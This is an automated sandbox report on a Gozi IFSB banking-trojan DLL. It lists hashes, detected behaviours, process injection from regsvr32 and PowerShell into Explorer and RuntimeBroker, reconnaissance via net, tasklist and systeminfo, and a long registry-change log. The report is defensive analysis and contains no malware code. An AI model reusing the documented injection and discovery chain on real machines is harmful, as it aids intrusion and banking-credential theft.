Malware Analysis Report

2024-10-23 15:37

Sample ID: 220803-thgh4sche6
Target: de00c4750accf516704b8c0df265c24a
SHA256: 7dae6d6fb339b6114ffdd3c0b6bcaa2c9dab0a73979fec029801e9e16d7d06bc
Tags: gozi_ifsb, 3000, banker, trojan
Score: 10/10

Table of Contents

Analysis Overview
MITRE ATT&CK
  Enterprise Matrix V6
Analysis: static1
  Detonation Overview
  Signatures
Analysis: behavioral1
  Detonation Overview
  Command Line
  Signatures
  Processes
  Network
  Files
Analysis: behavioral2
  Detonation Overview
  Command Line
  Signatures
  Processes
  Network
  Files

Analysis Overview

Score: 10/10

SHA256: 7dae6d6fb339b6114ffdd3c0b6bcaa2c9dab0a73979fec029801e9e16d7d06bc

Threat Level: Known bad

The file de00c4750accf516704b8c0df265c24a was found to be: Known bad.

Malicious Activity Summary

gozi_ifsb 3000 banker trojan

Gozi, Gozi IFSB

Checks computer location settings

Suspicious use of SetThreadContext

Enumerates physical storage devices

Suspicious behavior: GetForegroundWindowSpam

Suspicious use of AdjustPrivilegeToken

Suspicious behavior: MapViewOfSection

Gathers system information

Runs net.exe

Enumerates processes with tasklist

Modifies registry class

Suspicious use of SetWindowsHookEx

Suspicious use of WriteProcessMemory

Suspicious behavior: EnumeratesProcesses

Discovers systems in the same network

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported: 2022-08-03 16:03

Signatures

N/A

Analysis: behavioral1

Detonation Overview

Submitted: 2022-08-03 16:03
Reported: 2022-08-03 16:05
Platform: win7-20220715-en
Max time kernel: 45s
Max time network: 48s

Command Line

regsvr32 /s C:\Users\Admin\AppData\Local\Temp\de00c4750accf516704b8c0df265c24a.dll

Signatures

Gozi, Gozi IFSB

banker trojan gozi_ifsb

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 1092 wrote to memory of 1644 N/A C:\Windows\system32\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe
PID 1092 wrote to memory of 1644 N/A C:\Windows\system32\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe
PID 1092 wrote to memory of 1644 N/A C:\Windows\system32\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe
PID 1092 wrote to memory of 1644 N/A C:\Windows\system32\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe
PID 1092 wrote to memory of 1644 N/A C:\Windows\system32\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe
PID 1092 wrote to memory of 1644 N/A C:\Windows\system32\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe
PID 1092 wrote to memory of 1644 N/A C:\Windows\system32\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe

Processes

C:\Windows\system32\regsvr32.exe

regsvr32 /s C:\Users\Admin\AppData\Local\Temp\de00c4750accf516704b8c0df265c24a.dll

C:\Windows\SysWOW64\regsvr32.exe

/s C:\Users\Admin\AppData\Local\Temp\de00c4750accf516704b8c0df265c24a.dll

Network

N/A

Files

memory/1092-54-0x000007FEFBE31000-0x000007FEFBE33000-memory.dmp

memory/1644-55-0x0000000000000000-mapping.dmp

memory/1644-56-0x0000000075481000-0x0000000075483000-memory.dmp

memory/1644-57-0x0000000010000000-0x000000001000E000-memory.dmp

memory/1644-62-0x00000000000E0000-0x00000000000ED000-memory.dmp

Analysis: behavioral2

Detonation Overview

Submitted: 2022-08-03 16:03
Reported: 2022-08-03 16:05
Platform: win10v2004-20220721-en
Max time kernel: 150s
Max time network: 125s

Command Line

C:\Windows\System32\RuntimeBroker.exe -Embedding

Signatures

Gozi, Gozi IFSB

banker trojan gozi_ifsb

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-2660308776-3705150086-26593515-1000\Control Panel\International\Geo\Nation C:\Windows\System32\mshta.exe N/A

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 3932 set thread context of 3020 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Explorer.EXE
PID 3020 set thread context of 3448 N/A C:\Windows\Explorer.EXE C:\Windows\System32\RuntimeBroker.exe
PID 3020 set thread context of 3720 N/A C:\Windows\Explorer.EXE C:\Windows\System32\RuntimeBroker.exe
PID 3020 set thread context of 4104 N/A C:\Windows\Explorer.EXE C:\Windows\System32\RuntimeBroker.exe
PID 3020 set thread context of 536 N/A C:\Windows\Explorer.EXE C:\Windows\System32\RuntimeBroker.exe
PID 3020 set thread context of 2616 N/A C:\Windows\Explorer.EXE C:\Windows\syswow64\cmd.exe

Enumerates physical storage devices

Discovers systems in the same network

discovery

Description Indicator Process Target
N/A N/A C:\Windows\system32\net.exe N/A
N/A N/A C:\Windows\system32\net.exe N/A
N/A N/A C:\Windows\system32\net.exe N/A

Enumerates processes with tasklist

Description Indicator Process Target
N/A N/A C:\Windows\system32\tasklist.exe N/A

Gathers system information

Description Indicator Process Target
N/A N/A C:\Windows\system32\systeminfo.exe N/A

Modifies registry class

Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-2660308776-3705150086-26593515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\b26a4060-92d1-4d12-b C:\Windows\System32\RuntimeBroker.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2660308776-3705150086-26593515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\b26a4060-92d1-4d12-b = "\\\\?\\Volume{40BEAA24-0000-0000-0000-D01200000000}\\Users\\Admin\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\StagedAssets\\db13e6613606261e295c366b3400b7db9497f7721833709005687624cef2c870" C:\Windows\System32\RuntimeBroker.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2660308776-3705150086-26593515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\da74b967-1d72-46d1-a = "8324" C:\Windows\System32\RuntimeBroker.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2660308776-3705150086-26593515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\51143b95-e0b2-4c00-a = "0" C:\Windows\System32\RuntimeBroker.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2660308776-3705150086-26593515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\11f92fce-4a7d-4556-a C:\Windows\System32\RuntimeBroker.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2660308776-3705150086-26593515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\13cad353-7f43-49c5-b = "8324" C:\Windows\System32\RuntimeBroker.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2660308776-3705150086-26593515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\d9c3e5cc-f402-4e80-9 = "8324" C:\Windows\System32\RuntimeBroker.exe N/A
Key deleted \REGISTRY\USER\S-1-5-21-2660308776-3705150086-26593515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\b26a4060-92d1-4d12-b C:\Windows\System32\RuntimeBroker.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2660308776-3705150086-26593515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\10ca6057-baf0-4b43-a = "0" C:\Windows\System32\RuntimeBroker.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2660308776-3705150086-26593515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\c5660f14-860c-4e81-9 C:\Windows\System32\RuntimeBroker.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2660308776-3705150086-26593515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\c5660f14-860c-4e81-9 = "8324" C:\Windows\System32\RuntimeBroker.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-2660308776-3705150086-26593515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\11f92fce-4a7d-4556-a = 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 C:\Windows\System32\RuntimeBroker.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-2660308776-3705150086-26593515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\13cad353-7f43-49c5-b = 4de967a852a7d801 C:\Windows\System32\RuntimeBroker.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2660308776-3705150086-26593515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\dddedab3-0d57-46a6-8 C:\Windows\System32\RuntimeBroker.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2660308776-3705150086-26593515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\dddedab3-0d57-46a6-8 C:\Windows\System32\RuntimeBroker.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2660308776-3705150086-26593515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System C:\Windows\System32\RuntimeBroker.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2660308776-3705150086-26593515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\4d62eb4a-b3b9-4465-8 = "0" C:\Windows\System32\RuntimeBroker.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-2660308776-3705150086-26593515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\51143b95-e0b2-4c00-a = f1f395a652a7d801 C:\Windows\System32\RuntimeBroker.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2660308776-3705150086-26593515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\c5660f14-860c-4e81-9 = "\\\\?\\Volume{40BEAA24-0000-0000-0000-D01200000000}\\Users\\Admin\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\StagedAssets\\43062c64cdc78544bd046edef55edfa8170856ee30b98e629b82464899b859a6" C:\Windows\System32\RuntimeBroker.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2660308776-3705150086-26593515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\c5660f14-860c-4e81-9 = "0" C:\Windows\System32\RuntimeBroker.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2660308776-3705150086-26593515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\a47e7349-31b8-48b4-9 = "8324" C:\Windows\System32\RuntimeBroker.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2660308776-3705150086-26593515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\13cad353-7f43-49c5-b C:\Windows\System32\RuntimeBroker.exe N/A
Key deleted \REGISTRY\USER\S-1-5-21-2660308776-3705150086-26593515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\c5660f14-860c-4e81-9 C:\Windows\System32\RuntimeBroker.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2660308776-3705150086-26593515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\4d62eb4a-b3b9-4465-8 = "8324" C:\Windows\System32\RuntimeBroker.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2660308776-3705150086-26593515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\11f92fce-4a7d-4556-a = "0" C:\Windows\System32\RuntimeBroker.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2660308776-3705150086-26593515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\13cad353-7f43-49c5-b = "0" C:\Windows\System32\RuntimeBroker.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2660308776-3705150086-26593515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\dddedab3-0d57-46a6-8 = "Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy" C:\Windows\System32\RuntimeBroker.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2660308776-3705150086-26593515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\dddedab3-0d57-46a6-8 = "8324" C:\Windows\System32\RuntimeBroker.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2660308776-3705150086-26593515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\da74b967-1d72-46d1-a = "0" C:\Windows\System32\RuntimeBroker.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-2660308776-3705150086-26593515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\d9c3e5cc-f402-4e80-9 = 9baac7a852a7d801 C:\Windows\System32\RuntimeBroker.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2660308776-3705150086-26593515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\084ec861-8ea3-4666-8 = "8324" C:\Windows\System32\RuntimeBroker.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2660308776-3705150086-26593515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\51143b95-e0b2-4c00-a C:\Windows\System32\RuntimeBroker.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2660308776-3705150086-26593515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\a47e7349-31b8-48b4-9 = "\\\\?\\Volume{40BEAA24-0000-0000-0000-D01200000000}\\Users\\Admin\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\StagedAssets\\93214ced978b1f3fa5c37bde5aa71302a07ca2e9469b370cc11bc61930803bf3" C:\Windows\System32\RuntimeBroker.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-2660308776-3705150086-26593515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\da74b967-1d72-46d1-a = 30ca9fa852a7d801 C:\Windows\System32\RuntimeBroker.exe N/A
Key deleted \REGISTRY\USER\S-1-5-21-2660308776-3705150086-26593515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\084ec861-8ea3-4666-8 C:\Windows\System32\RuntimeBroker.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2660308776-3705150086-26593515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\4d62eb4a-b3b9-4465-8 = "Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy" C:\Windows\System32\RuntimeBroker.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2660308776-3705150086-26593515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\4d62eb4a-b3b9-4465-8 = "\\\\?\\Volume{40BEAA24-0000-0000-0000-D01200000000}\\Users\\Admin\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\StagedAssets\\6d63c6516ae1a7e40eea65da02de168692eb5c3f1bf44f97063858c3198e0171" C:\Windows\System32\RuntimeBroker.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2660308776-3705150086-26593515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\b26a4060-92d1-4d12-b = "Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy" C:\Windows\System32\RuntimeBroker.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2660308776-3705150086-26593515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\b26a4060-92d1-4d12-b = "8324" C:\Windows\System32\RuntimeBroker.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-2660308776-3705150086-26593515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\b26a4060-92d1-4d12-b = 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 C:\Windows\System32\RuntimeBroker.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2660308776-3705150086-26593515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\a47e7349-31b8-48b4-9 C:\Windows\System32\RuntimeBroker.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2660308776-3705150086-26593515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\da74b967-1d72-46d1-a = "\\\\?\\Volume{40BEAA24-0000-0000-0000-D01200000000}\\Users\\Admin\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\StagedAssets\\8b1ea3dafdc11380b50b7cb71940868d9f0ca3e1578253ed3647204878806d8f" C:\Windows\System32\RuntimeBroker.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-2660308776-3705150086-26593515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\13cad353-7f43-49c5-b = [binary value omitted] C:\Windows\System32\RuntimeBroker.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-2660308776-3705150086-26593515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\4d62eb4a-b3b9-4465-8 = 8c676aa652a7d801 C:\Windows\System32\RuntimeBroker.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2660308776-3705150086-26593515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\b26a4060-92d1-4d12-b = "0" C:\Windows\System32\RuntimeBroker.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2660308776-3705150086-26593515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\084ec861-8ea3-4666-8 = "0" C:\Windows\System32\RuntimeBroker.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2660308776-3705150086-26593515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\51143b95-e0b2-4c00-a = "Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy" C:\Windows\System32\RuntimeBroker.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-2660308776-3705150086-26593515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\10ca6057-baf0-4b43-a = 3eaaa8a652a7d801 C:\Windows\System32\RuntimeBroker.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-2660308776-3705150086-26593515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\c5660f14-860c-4e81-9 = 0f69c8a652a7d801 C:\Windows\System32\RuntimeBroker.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2660308776-3705150086-26593515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\a47e7349-31b8-48b4-9 = "Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy" C:\Windows\System32\RuntimeBroker.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-2660308776-3705150086-26593515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\dddedab3-0d57-46a6-8 = e5157fa852a7d801 C:\Windows\System32\RuntimeBroker.exe N/A
Key deleted \REGISTRY\USER\S-1-5-21-2660308776-3705150086-26593515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\51143b95-e0b2-4c00-a C:\Windows\System32\RuntimeBroker.exe N/A
Key deleted \REGISTRY\USER\S-1-5-21-2660308776-3705150086-26593515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\4d62eb4a-b3b9-4465-8 C:\Windows\System32\RuntimeBroker.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-2660308776-3705150086-26593515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\11f92fce-4a7d-4556-a = 4f3b44a852a7d801 C:\Windows\System32\RuntimeBroker.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2660308776-3705150086-26593515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\11f92fce-4a7d-4556-a = "\\\\?\\Volume{40BEAA24-0000-0000-0000-D01200000000}\\Users\\Admin\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\StagedAssets\\89e438a32df92b68baa99a7b1f853e9c5016ac2f42d270dcdb0f22cca0d53f2e" C:\Windows\System32\RuntimeBroker.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-2660308776-3705150086-26593515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\da74b967-1d72-46d1-a = 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 C:\Windows\System32\RuntimeBroker.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2660308776-3705150086-26593515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\d9c3e5cc-f402-4e80-9 = "0" C:\Windows\System32\RuntimeBroker.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2660308776-3705150086-26593515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\d9c3e5cc-f402-4e80-9 = "Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy" C:\Windows\System32\RuntimeBroker.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-2660308776-3705150086-26593515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\b26a4060-92d1-4d12-b = 127f80a652a7d801 C:\Windows\System32\RuntimeBroker.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2660308776-3705150086-26593515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\084ec861-8ea3-4666-8 = "Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy" C:\Windows\System32\RuntimeBroker.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-2660308776-3705150086-26593515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\a47e7349-31b8-48b4-9 = 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 C:\Windows\System32\RuntimeBroker.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2660308776-3705150086-26593515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\11f92fce-4a7d-4556-a = "8324" C:\Windows\System32\RuntimeBroker.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2660308776-3705150086-26593515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\13cad353-7f43-49c5-b C:\Windows\System32\RuntimeBroker.exe N/A
